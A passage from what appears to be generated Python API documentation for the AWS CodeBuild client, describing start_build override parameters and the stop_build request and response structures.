For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type secondaryArtifactsOverride: list
:param secondaryArtifactsOverride:
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type environmentVariablesOverride: list
:param environmentVariablesOverride:
A set of environment variables that overrides, for this build only, the latest ones already defined in the build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
:type sourceTypeOverride: string
:param sourceTypeOverride:
A source input type, for this build, that overrides the source input defined in the build project.
:type sourceLocationOverride: string
:param sourceLocationOverride:
A location that overrides, for this build, the source location for the one defined in the build project.
:type sourceAuthOverride: dict
:param sourceAuthOverride:
An authorization type for this build that overrides the one defined in the build project. This override applies only if the build project\'s source is BitBucket or GitHub.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
:type gitCloneDepthOverride: integer
:param gitCloneDepthOverride:
The user-defined depth of history, with a minimum value of 0, that overrides, for this build only, any previous depth of history defined in the build project.
:type gitSubmodulesConfigOverride: dict
:param gitSubmodulesConfigOverride:
Information about the Git submodules configuration for this build of an AWS CodeBuild build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
:type buildspecOverride: string
:param buildspecOverride:
A build spec declaration that overrides, for this build only, the latest one already defined in the build project.
:type insecureSslOverride: boolean
:param insecureSslOverride:
Enable this flag to override the insecure SSL setting that is specified in the build project. The insecure SSL setting determines whether to ignore SSL warnings while connecting to the project source code. This override applies only if the build\'s source is GitHub Enterprise.
:type reportBuildStatusOverride: boolean
:param reportBuildStatusOverride:
Set to true to report to your source provider the status of a build\'s start and completion. If you use this option with a source provider other than GitHub, GitHub Enterprise, or Bitbucket, an invalidInputException is thrown.
:type environmentTypeOverride: string
:param environmentTypeOverride:
A container type for this build that overrides the one specified in the build project.
:type imageOverride: string
:param imageOverride:
The name of an image for this build that overrides the one specified in the build project.
:type computeTypeOverride: string
:param computeTypeOverride:
The name of a compute type for this build that overrides the one specified in the build project.
:type certificateOverride: string
:param certificateOverride:
The name of a certificate for this build that overrides the one specified in the build project.
:type cacheOverride: dict
:param cacheOverride:
A ProjectCache object specified for this build that overrides the one defined in the build project.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
:type serviceRoleOverride: string
:param serviceRoleOverride:
The name of a service role for this build that overrides the one specified in the build project.
:type privilegedModeOverride: boolean
:param privilegedModeOverride:
Enable this flag to override privileged mode in the build project.
:type timeoutInMinutesOverride: integer
:param timeoutInMinutesOverride:
The number of build timeout minutes, from 5 to 480 (8 hours), that overrides, for this build only, the latest setting already defined in the build project.
:type queuedTimeoutInMinutesOverride: integer
:param queuedTimeoutInMinutesOverride:
The number of minutes a build is allowed to be queued before it times out.
:type idempotencyToken: string
:param idempotencyToken:
A unique, case sensitive identifier you provide to ensure the idempotency of the StartBuild request. The token is included in the StartBuild request and is valid for 12 hours. If you repeat the StartBuild request with the same token, but change a parameter, AWS CodeBuild returns a parameter mismatch error.
:type logsConfigOverride: dict
:param logsConfigOverride:
Log settings for this build that override the log settings defined in the build project.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
:type registryCredentialOverride: dict
:param registryCredentialOverride:
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
:type imagePullCredentialsTypeOverride: string
:param imagePullCredentialsTypeOverride:
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild\'s service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project\'s service role.
When using a cross-account or private registry image, you must use SERVICE_ROLE credentials. When using an AWS CodeBuild curated image, you must use CODEBUILD credentials.
:rtype: dict
:returns:
"""
pass
def stop_build(self, id: str) -> Dict:
"""
Attempts to stop running a build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/StopBuild>`_
**Request Syntax**
::
response = client.stop_build(
id='string'
)
**Response Syntax**
::
{
'build': {
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
}
}
**Response Structure**
- *(dict) --*
- **build** *(dict) --*
Information about the build.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and BitBucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
How long, in seconds, between the starting and ending times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
